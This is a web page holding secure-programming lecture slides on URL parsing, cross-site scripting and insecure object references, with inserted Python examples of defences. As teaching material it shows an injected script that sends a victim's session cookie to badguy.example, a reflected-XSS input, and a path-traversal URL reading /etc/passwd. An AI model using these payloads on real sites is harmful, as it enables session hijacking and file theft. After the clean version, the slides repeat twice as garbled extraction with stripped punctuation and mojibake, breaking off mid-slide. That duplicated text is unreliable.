Post on 04-Jul-2020
Secure Programming Lecture 11: Web Application Security II
David Aspinall
3rd March 2014
Outline
- Overview
- Basics: URLs
- Output Filtering and XSS
- Object references
Recap
Programming web applications securely is perhaps the most important case of secure programming today.
- Web is ubiquitous
  - browsers on almost every device
  - cloud-provisioned applications on the rise
- Web technologies are ubiquitous
  - HTML5/JavaScript platform on the rise
  - replacing Flash, Silverlight, etc.
  - cross-platform app programming (Tizen, PhoneGap)
  - although JS has serious drawbacks as a programming language
OWASP Top 10 list, 2013
- A1 Injection (covered previously)
- A2 Broken Authentication and Session Management (covered previously)
- A3 Cross-Site Scripting (XSS)
- A4 Insecure Direct Object References
- A5 Security Misconfiguration
- A6 Sensitive Data Exposure
- A7 Missing Function Level Access Control
- A8 Cross-Site Request Forgery (CSRF)
- A9 Using Components with Known Vulnerabilities
- A10 Unvalidated Redirects and Forwards
Structure of URLs
Full URLs, specified in RFC 3986, have up to eight parts.
URL anatomy: scheme://login:password@address:port/path/to/resource?query_string#fragment
1. scheme: the scheme (protocol) name
2. "://": indicator of a hierarchical URL
3. login:password: credentials for access (optional)
4. address: server to retrieve the data from
5. port: port number to connect to (optional)
6. /path/to/resource: hierarchical Unix-style path
7. ?query_string: parameters (optional)
8. #fragment: identifier (optional)
Parts 3-5 together are called the authority.
Scheme name
scheme:
- A case-insensitive string, ending with a colon
- Officially registered names are assigned by IANA
  - http, https, ftp and many others
  - in fact (2014): 87 permanent, 91 provisional, 9 historical
  - e.g. spotify, nfs, soap.beep, tv, paparazzi
- also pseudo-URL schemes interpreted by browsers, e.g. javascript:
- and document-fetching schemes handed to plugins/apps, e.g. mailto:, itms:, cf:
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must have the fixed string "://".
- Otherwise the URL is scheme-specific, e.g. mailto:bob@ed.ac.uk?subject=Hello
Idea: hierarchical URLs can be parsed generically.
Unfortunately:
- the original RFC 1738 didn't rule out non-hierarchical URLs that contain "//"
- nor forbid (in practice) parsing URLs without "//"
Consequence of under-specification
Despite the motivations behind XHTML to stop bad HTML on the web, browser implementations are still (deliberately) lax, to be friendly to buggy web pages and bug-producing developers, and for backward compatibility. (Q: Why?)
For URLs which don't clearly conform to the original RFC, this leads to possibly unexpected treatments that vary between browsers:
http:example.com/ (no "//": read as a relative path by some browsers, as a host by others)
javascript://example.com/%0aalert(1) (the "//example.com/" is a JavaScript comment; %0a is a newline, so alert(1) runs)
mailto://user@example.com
Examples from The Tangled Web.
Credentials
login:password@
- optional; if not supplied, the browser acts "anonymously"
- interpretation is protocol-specific
- a wide range of characters is possible
- some browsers reject certain punctuation characters
Server address
address
The RFC is quite strict:
- case-insensitive DNS name (www.ed.ac.uk)
- IPv4: 129.215.233.64
- IPv6 in brackets: [2001:4860:a005:0:0:0:0:68]
Implementations are more relaxed:
- range of characters beyond the DNS spec
- mix of digit formats: http://0x7f.1/ = http://127.0.0.1/
Question: Why is this relevant to secure web app programming?
Server port
:8080
A decimal number preceded by a colon.
Usually omitted: the default port number for the protocol is used
- e.g. 80 for HTTP, 443 for HTTPS, 21 for FTP
- sometimes servers on non-standard ports are useful
Question: What threats might this lead to?
Hierarchical file path
/path/to/resource
- A Unix-style path. Must resolve "." and ".."
- Relative paths allow for non-fully-qualified URLs
- old-style apps
  - direct connection with the file system
  - resource = HTML file served by the server
- modern apps
  - very indirect
  - complicated URL rewriting, dynamic content
  - paths mapped to parts of programs or a database
  - server may be embedded in the app
Question: What implications does this have for reviewing the security of web apps?
Query string
?search=purple+bananas
Optional; intended to pass arbitrary parameters to the resource. The commonly used syntax
name1=value1&name2=value2
is not part of the URL syntax: it comes from mail and HTML forms. So
- the server may not presume/enforce the query string format
- web applications may legally use other forms after ?
Fragment identifier
#lastsection
- Interpretation depends on the client and resource type; in practice, anchor names in HTML elements
- Not intended to be sent to the server
- Recent use: store client-side state while browsing
  - can be changed without page reload
  - easily bookmarked, shared
  - e.g. map locations
Metacharacters
- Some punctuation characters are not allowed (or are reserved), e.g. [ ] $ & ' ( ) = ...
- These are URL-encoded as a percent sign followed by two ASCII hex digits, e.g. %2F encodes /, %25 encodes %
The RFC does not specify a fixed mapping, and browsers try to interpret as many user inputs as possible,
e.g. http://%65xample.%63om/ (percent-encoded letters inside the host name).
Moreover, RFCs are not always followed.
Non-ASCII text encodings in URLs
- Original standards did not allow for non-ASCII text
- but clearly desirable for non-English text
- RFC 3492 introduced Punycode (used by IDNA) to allow a behind-the-scenes DNS lookup
  - DNS lookup: xn--[US-ASCII part]-[encoded Unicode part]
  - browser display: the Unicode form
Extending 38 characters to 100,000 glyphs allowed many homograph attacks:
- pea.com has 5 identical-looking Cyrillic characters (р, е, а, с, о)
- there are non-slash characters that look like /
- some attacks are not easily prevented by DNS registrars
We have (puny) browser and search-engine defences for this. Moral: probably better to stick with ASCII.
Overall consequences
Parsing URLs is more complicated than you imagined
- better to use well-tested libraries than ad hoc code
But for output, you want to be very careful
- especially if URLs are made from user (attacker) input
- should canonicalize, then filter, then reformat
- filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs:
http://example.com&gibberish=1234@167772161/ (everything before @ is credentials; the host is 167772161, i.e. 10.0.0.1)
followed by two URLs of the form http://example.com…@coredump.cx/ that differ only in the punctuation before @ (lost in extraction)
Which server is visited by these URLs?
Examples from The Tangled Web.
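The canonicalize-then-filter advice above, as an added worked example (not code from the lecture or from The Tangled Web): Python that parses a URL with the standard library, rejects non-http(s) schemes and embedded credentials, and canonicalises the numeric host forms browsers accept (hex, octal, decimal components, or one bare integer) before comparing against a host allow-list. The allow-list and the sample inputs are constructed for illustration; the URL forms are the ones quoted on the slides.

```python
# Added example, not from the lecture: canonicalise a URL, then filter on
# scheme and authority.  Allow-list and sample inputs are constructed.
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def parse_legacy_ipv4(host):
    """Interpret a host the way browsers interpret numeric IPv4 literals.

    Each dotted component may be decimal, octal (leading 0) or hex (0x); the
    last component fills all remaining bytes, so "0x7f.1" and "167772161"
    are both addresses.  Returns dotted-quad text, or None if the host is not
    a numeric literal.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = []
    for p in parts:
        try:
            if p[:2].lower() == "0x":
                n = int(p[2:] or "0", 16)
            elif len(p) > 1 and p[0] == "0":
                n = int(p, 8)
            elif p.isdigit():
                n = int(p, 10)
            else:
                return None
        except ValueError:
            return None
        nums.append(n)
    if any(n > 255 for n in nums[:-1]):
        return None
    remaining = 4 - (len(nums) - 1)        # bytes covered by the last component
    if nums[-1] >= 256 ** remaining:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << (8 * remaining)) | nums[-1]
    return str(ipaddress.IPv4Address(value))


def vet_url(url, allowed_hosts):
    """Return (canonical_host, reason); canonical_host is None on rejection."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:       # urlsplit lower-cases the scheme
        return None, "scheme not allowed: %r" % parts.scheme
    if parts.username is not None or parts.password is not None:
        # "example.com&gibberish=1234@167772161" parses as credentials + host
        return None, "credentials in authority: %r" % parts.netloc
    host = parts.hostname                         # lower-cased, brackets stripped
    if not host:
        return None, "no host (scheme-relative or malformed URL)"
    canonical = parse_legacy_ipv4(host) or host
    if canonical not in allowed_hosts:
        return None, "host %r (canonical %r) not allowed" % (host, canonical)
    return canonical, "ok"


if __name__ == "__main__":
    samples = [  # constructed inputs, including the forms quoted on the slides
        "http://0x7f.1/",
        "http://example.com&gibberish=1234@167772161/",
        "javascript://example.com/%0aalert(1)",
        "http:example.com/",
        "HTTP://Example.COM/path?q=1",
    ]
    for u in samples:
        print(u, "->", vet_url(u, {"example.com", "127.0.0.1"}))
```

The order matters: decide on the scheme first, then refuse anything with a userinfo part (almost never legitimate in application-generated links, and the main trick in the eyeball-fooling examples), and only then compare the host, after it has been rewritten into the form the browser will actually connect to.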
XSS attacks in general
- Attack typically on (another) user of the web app
- Attacker tricks the app into displaying malicious code, typically script code
Many possible aims:
- display random images, popup windows
- change page contents, e.g. alter a bank account number
- session hijacking: steal session cookies
Session hijacking with XSS
[Picture from Innocent Code]
Example injected script:
<script>document.location.replace("http://www.badguy.example/steal.php?what=" + document.cookie)</script>
- redirects the victim's browser to the attacker's site, passing the cookie
- might also pass the currently visited web page; then the attacker's server can issue a redirect back again
Reflected XSS
Reflected XSS occurs when the injected malicious code isn't stored on the server but is immediately displayed in the visited page. Suppose
http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc
dynamically makes HTML embedding the title directly:
<h1>Man GCC</h1>
An attacker could use this with a malicious input
title=<script>...</script>&program=gcc
which, e.g., steals a cookie.
Exercise: Explain how this attack works in practice.
XSS Solutions
Input processing is tricky: need to understand data flow through the app, quoting, encoding, passing to/from functions, databases, etc. Hence: output filtering.
Plain output: HTML encoding
- Stored data values need to be encoded to represent them in HTML (e.g. < converted to &lt; etc.)
Marked-up output: complex filtering
- Need to work through tags in the input and rule out risky ones. Scripts may appear in attributes. Flaky.
Marked-up output: DSL
- A better approach: use a dedicated syntax, converted to a restricted subset of HTML
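An added example (not the lecture's code) of the manpage.php rendering from the reflected-XSS slide, in Python: the parameters are first embedded directly (vulnerable), then HTML-encoded for element content and for a quoted attribute. A separate helper shows the case that encoding cannot fix, a user-supplied href with a javascript: scheme, which needs scheme filtering instead. The page layout, the /man/ link and the payloads are constructed for illustration.

```python
# Added example, not from the lecture: output encoding for the manpage.php
# page.  Layout, the /man/ link and the sample payloads are constructed.
import html
from urllib.parse import parse_qs, urlsplit


def params_from_url(url):
    """Pull title and program out of a request URL, as the PHP script would."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return q.get("title", [""])[0], q.get("program", [""])[0]


def render_vulnerable(title, program):
    """Embeds the parameters directly: reflected XSS in both contexts."""
    return '<h1>%s</h1>\n<a href="/man/%s">source</a>' % (title, program)


def render_encoded(title, program):
    """Encode each value for the context it lands in.

    Element content needs < > & encoded; a quoted attribute value also needs
    the quote characters, which html.escape(quote=True) handles.  The
    attribute must be quoted in the template for this to be sufficient.
    """
    return '<h1>%s</h1>\n<a href="/man/%s">source</a>' % (
        html.escape(title, quote=True), html.escape(program, quote=True))


def safe_href(url):
    """Encoding cannot neutralise a javascript: URL placed in href; the
    scheme has to be filtered.  Relative URLs and http(s) pass; anything
    else is replaced by a harmless fragment link."""
    if urlsplit(url).scheme not in ("", "http", "https"):
        return "#"
    return html.escape(url, quote=True)


if __name__ == "__main__":
    req = ("http://mymanpages.org/manpage.php?"
           "title=%3Cscript%3Ealert(document.cookie)%3C/script%3E&program=gcc")
    t, p = params_from_url(req)
    print(render_vulnerable(t, p))
    print(render_encoded(t, p))
    print(safe_href("javascript:alert(1)"))
```

The point of the attribute case is that "encode < and >" is not a complete rule: a payload such as gcc" onmouseover="alert(1) contains neither, and only quote-encoding keeps it inside the attribute value.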
Embarrassing PHP blunders
http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction
A "cool" PHP script, showhtml.php:
- take a plain HTML file
- wrap it with navigation links, site style
- convert the internal links to reference back to the wrapped version
Embarrassing PHP blunders
http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%2Fpasswd
- remote users can view any file on the system that the web server process can read
- the mistake motivates defence-in-depth:
  - the HTTP server should not serve up any file
  - use internal web server config (separate apps)
  - and external OS config (e.g. nobody user, chroot)
Authorization and object access
What was the problem here?
- the app developer (implicitly) authorized users to read documentation files he had created
  - project was open source: no need for logins
  - app contained no paths to files outside the project
  - so no explicit authorization code was written
- but the PHP code didn't check the filename returned
  - showhtml.php provided access to server objects
  - input validation only checked for file existence
There should have been a re-authorization step. A well-written app should only allow access to its own resources.
Looking at anyone's bank account
<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>
The account number is the object reference itself: submitting any other account number shows that account, because the server never checks that it belongs to the logged-in user.
Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account". A genius, clearly.
Solutions for object referencing
Re-validate
- Check authorization again
- Obvious solution, but duplicates effort
Add a data indirection
- Session-specific server-side array of account numbers:
<option value="1">12345678901</option>
<option value="2">12346543210</option>
- Similarly for file access:
http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction
For many files, a hash table or database could be used.
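The two fixes on this slide, re-validation and data indirection, as an added Python example (not from the lecture). A per-session object holds the accounts the logged-in user owns and the documents showhtml.php may serve; clients get only small indices or random tokens, and any path that does reach the file system is re-checked against the document root after "." / ".." and symlinks are resolved. Account numbers, the /srv/docs document root and the session structure are constructed for illustration.

```python
# Added example, not from the lecture: re-validation and data indirection for
# the show-account.asp and showhtml.php references.  Account numbers, the
# document root and the session layout are constructed for illustration.
import os
import secrets


class Session:
    """Server-side state for one logged-in user."""

    def __init__(self, owned_accounts, doc_root):
        self.accounts = list(owned_accounts)        # small index -> account number
        self.doc_root = os.path.realpath(doc_root)
        self.file_tokens = {}                       # random token -> relative path

    # Data indirection: the client only ever sees an index into this user's
    # own list, so substituting someone else's account number cannot work.
    def account_options(self):
        return ['<option value="%d">%s</option>' % (i, acct)
                for i, acct in enumerate(self.accounts)]

    def resolve_account(self, value):
        """Map the submitted index back to an account, or None if out of range."""
        try:
            i = int(value)
        except ValueError:
            return None
        return self.accounts[i] if 0 <= i < len(self.accounts) else None

    # Indirection for files: hand out an unguessable token per document.
    def register_file(self, relpath):
        token = secrets.token_urlsafe(8)
        self.file_tokens[token] = relpath
        return token

    def resolve_file(self, token):
        rel = self.file_tokens.get(token)
        return None if rel is None else self.resolve_path(rel)

    # Re-validation: whatever path we are about to open (from a token or, in
    # the old design, straight from the query string) must lie inside the
    # document tree once ".." and symlinks are resolved.
    def resolve_path(self, relpath):
        full = os.path.realpath(os.path.join(self.doc_root, relpath))
        if os.path.commonpath([full, self.doc_root]) != self.doc_root:
            return None
        return full


if __name__ == "__main__":
    s = Session(["12345678901", "12346543210"], "/srv/docs")
    print("\n".join(s.account_options()))
    print(s.resolve_account("1"), s.resolve_account("12345678901"))
    print(s.resolve_path("release/Userman.html"), s.resolve_path("../../etc/passwd"))
```

Note the containment check is kept even behind the token map: it is the defence-in-depth layer for the day a registered path is built from something untrusted, and it is what the "re-validate" option amounts to when the file name still comes from the query string.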
Passing too much information
Old flaw: passing unnecessary information to the client and expecting it back unmodified.
<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>
Hidden fields are just form fields: the client can change the file the script reads and the address it mails to.
Protecting information in server data
Sometimes the server must pass information to the client during the interaction, but must protect it.
Example: editing a wiki page
<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText"></textarea>
</form>
Solution: add a MAC constructed with a server-side secret key:
<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">
Or could encrypt the pagename.
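The MAC-protected hidden field from the wiki slide, as an added Python example (not the lecture's code). The MAC is HMAC-SHA256 (the slide's 40-hex-digit value suggests SHA-1; the construction is the same), keyed with a server-side secret, and covers the field name, the value and a caller-supplied context such as the user id, so a MAC minted for one user or one field is not valid for another. The key, the field names and the context binding are assumptions.

```python
# Added example, not from the lecture: a MAC over a hidden form field.  The
# key, the field names and the user-id context are assumptions.
import hashlib
import hmac
import html
import secrets

SERVER_KEY = secrets.token_bytes(32)   # generated once at startup; never sent to clients


def mac_for(field_name, value, context=b""):
    """HMAC-SHA256 over (field name, value, context), each length-prefixed so
    that different splits of the same bytes cannot collide.  The context
    (e.g. the user id) binds the MAC to one user's session."""
    h = hmac.new(SERVER_KEY, digestmod=hashlib.sha256)
    for part in (field_name.encode(), value.encode(), context):
        h.update(len(part).to_bytes(4, "big"))
        h.update(part)
    return h.hexdigest()


def hidden_fields(pagename, user_id=""):
    """Emit the page name and its MAC as hidden inputs (HTML-encoded, as in the XSS section)."""
    mac = mac_for("pagename", pagename, user_id.encode())
    return ('<input type="hidden" name="pagename" value="%s">\n'
            '<input type="hidden" name="pagemac" value="%s">'
            % (html.escape(pagename, quote=True), mac))


def verify(form, user_id=""):
    """Return the page name only if its MAC checks out for this user, else None.
    compare_digest avoids leaking where the comparison failed through timing."""
    pagename = form.get("pagename", "")
    expected = mac_for("pagename", pagename, user_id.encode())
    supplied = form.get("pagemac", "")
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return None
    return pagename


if __name__ == "__main__":
    print(hidden_fields("NineteenSixtiesToys", "alice"))
    submitted = {"pagename": "NineteenSixtiesToys",
                 "pagemac": mac_for("pagename", "NineteenSixtiesToys", b"alice")}
    print(verify(submitted, "alice"), verify(dict(submitted, pagename="AdminSettings"), "alice"))
```

A MAC gives integrity, not secrecy: the client still sees the page name. The slide's alternative, encrypting it, hides the value but must still be authenticated (an authenticated-encryption mode, or encrypt-then-MAC), otherwise the ciphertext can be tampered with just as the plaintext could.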
Other authorization mistakes
Assuming requests occur in the proper order
- For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST, and only checking authorization on the first step
Authorization by obscurity
- Supposing that because a web page is not linked to from the main site, only people who are given its address will be able to reach it:
http://www.myserver.com/secretarea/privatepaper.pdf
Review questions
URLs
- Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?
XSS
- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?
Object references
- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.
References
Some commentary and examples were taken from the texts
- Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby. Wiley, 2004.
- The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski. No Starch Press, 2012. (Recommended)
as well as the named RFCs.
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Recap
Programming web applications securely is perhapsthe most important case of secure programming today
Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the rise
Eacute Web technologies are ubiquitousEacute HTML5JavaScript platform on the riseEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)Eacute although JS has serious drawbacks as a PL
OWASP Top 10 list 2013
Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible
Eacute some browsers reject certain punctuation chars
Server address
address
RFC is quite strict
Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]
Implementations are more relaxed
Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =
http127001
Question Why is this relevant to secure web appprogramming
Server port
8080
A decimal number preceded by a colon
Usually omitted the default port number for protocolused
Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful
Question What threats might this lead to
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Recap
Programming web applications securely is perhapsthe most important case of secure programming today
Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the rise
Eacute Web technologies are ubiquitousEacute HTML5JavaScript platform on the riseEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)Eacute although JS has serious drawbacks as a PL
OWASP Top 10 list 2013
Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Structure of URLs
Full URLs specified in RFC 3986 have up to eight parts
URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment
1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)
Parts 3-5 together are called the authority
Scheme name
scheme
A case-insensitive string ends with a colon
Officially registered names assigned by IANA
Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9
historicalEacute eg spotify nfs soapbeep tv paparazzi
Eacute also pseudo-URL schemes interpreted by browsersEacute eg javascript
Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf
Hierarchical versus scheme-specific
Every hierarchical URL in the generic syntax must havethe fixed string
Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello
Idea hierarchical URLs can be parsed generically
Unfortunately
Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain
Eacute nor forbid (in practice) parsing URLS without
Consequence of under-specificationDespite motivations behind XHTML to stop bad HTMLon the web browser implementations are still(deliberately) lax to try to be friendly to buggy webpages and bug-producing developers and backwardcompatibility (Q Why)
For URLs which donrsquot clearly conform to the originalRFC this leads to possibly unexpected treatments thatvary between browsers
httpexamplecom
javascriptexamplecom0alert(1)
mailtouserexamplecom
Examples from The Tangled Web
Credentials
loginpassword
